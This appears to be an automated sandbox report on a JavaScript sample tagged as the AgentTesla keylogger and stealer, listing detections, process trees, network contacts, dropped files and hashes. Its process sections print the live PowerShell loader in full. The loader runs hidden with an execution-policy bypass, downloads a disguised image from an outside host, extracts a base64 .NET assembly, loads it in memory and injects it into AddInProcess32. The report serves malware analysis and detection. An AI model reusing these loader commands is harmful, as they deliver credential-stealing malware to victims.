Malware Analysis Report

2024-11-30 05:49

Sample ID: 240610-nkbgzsgh9z
Target: ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js
SHA256: ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b
Tags: execution agenttesla keylogger spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b

Threat Level: Known bad

The file ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js was found to be: Known bad.

Malicious Activity Summary

execution agenttesla keylogger spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-10 11:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-10 11:26
Reported: 2024-06-10 11:29
Platform: win7-20240221-en
Max time kernel: 118s
Max time network: 119s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

Signatures

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: JavaScript

Tags: execution

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | paste.ee | udp
US | 104.21.84.67:443 | paste.ee | tcp
US | 8.8.8.8:53 | uploaddeimagens.com.br | udp
US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp
US | 8.8.8.8:53 | apps.identrust.com | udp
NL | 23.63.101.153:80 | apps.identrust.com | tcp

Files

memory/2580-20-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2580-22-0x0000000000670000-0x0000000000678000-memory.dmp

memory/2580-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-24-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-23-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-27-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-26-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-21-0x000000001B700000-0x000000001B9E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TJSTGYOGL36EIKQTS6X4.temp

MD5 4a827a117708c242a96a6cc938a2c837
SHA1 088b844b85ad639660a130e0629023dafaa2a9bd
SHA256 f792d54d061a1316243948c2a847ca9c0e679fca437c37d3d58040944b40a4c3
SHA512 9f43318f31e8ea4aaafbbe8a91fe8b85ee06585ee761454d6a7a1251411450c01bafea135450c9edee7a8961daf432d7eaa3902cf870b5b5114b98cdf6c04223

C:\Users\Admin\AppData\Local\Temp\Tar2E06.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab2DF3.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bd01f614a72e4cd4a932a7f852b8042
SHA1 770b7758a7a9b85c5a504fbae1cb7e674c1a4446
SHA256 15c6691d90b2b1f8a8e56faeae2ff72120fc4f8ace435d9bca22f30366350235
SHA512 a04e4f4fe469933f2ae6a955b50fecba19a358a730e512e0042023cba481ced4516931d59db55744b3e291e73f6d4191a2dcd404d06ec91bc5298d5ecc511635

C:\Users\Admin\AppData\Local\Temp\Tar32DC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 671bd0dfab4bf5681f03b147b4ab690b
SHA1 5bf69518848cc1654174c4c6a84ffb50932ff786
SHA256 a878a62f28d1c4ced8202bf0b53932b5d8294cec451af0829529e74d65270758
SHA512 8fd6208e0f993f0a9293aafec198dd829fc83399368ddaf23c9b558acefa9f4823756fd71d84be2958ae55865d9d638ddce621f527a12610d7c9d85baa3d444d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1664-100-0x000000001AE60000-0x000000001B04E000-memory.dmp

memory/2580-101-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-10 11:26
Reported: 2024-06-10 11:29
Platform: win10v2004-20240508-en
Max time kernel: 149s
Max time network: 153s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

Signatures

AgentTesla

Tags: keylogger trojan stealer spyware agenttesla

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1816 set thread context of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Command and Scripting Interpreter: JavaScript

Tags: execution

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4092 wrote to memory of 4968 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 4968 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | paste.ee | udp
US | 104.21.84.67:443 | paste.ee | tcp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 67.84.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 163.214.58.216.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.181.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | uploaddeimagens.com.br | udp
US | 172.67.215.45:443 | uploaddeimagens.com.br | tcp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 45.215.67.172.in-addr.arpa | udp
BG | 93.123.39.71:80 | 93.123.39.71 | tcp
US | 8.8.8.8:53 | 71.39.123.93.in-addr.arpa | udp
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp

Files

memory/4968-9-0x00007FFB50DF3000-0x00007FFB50DF5000-memory.dmp

memory/4968-15-0x00000173EA5C0000-0x00000173EA5E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_351f2t1c.eza.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-20-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/4968-21-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/1816-31-0x000001FDFEDC0000-0x000001FDFEFAE000-memory.dmp

memory/1764-32-0x0000000000400000-0x0000000000442000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

memory/4968-38-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/1764-39-0x00000000056B0000-0x0000000005C54000-memory.dmp

memory/1764-40-0x0000000005170000-0x00000000051D6000-memory.dmp

memory/1764-41-0x00000000063F0000-0x0000000006440000-memory.dmp

memory/1764-42-0x00000000064E0000-0x0000000006572000-memory.dmp

memory/1764-43-0x0000000006460000-0x000000000646A000-memory.dmp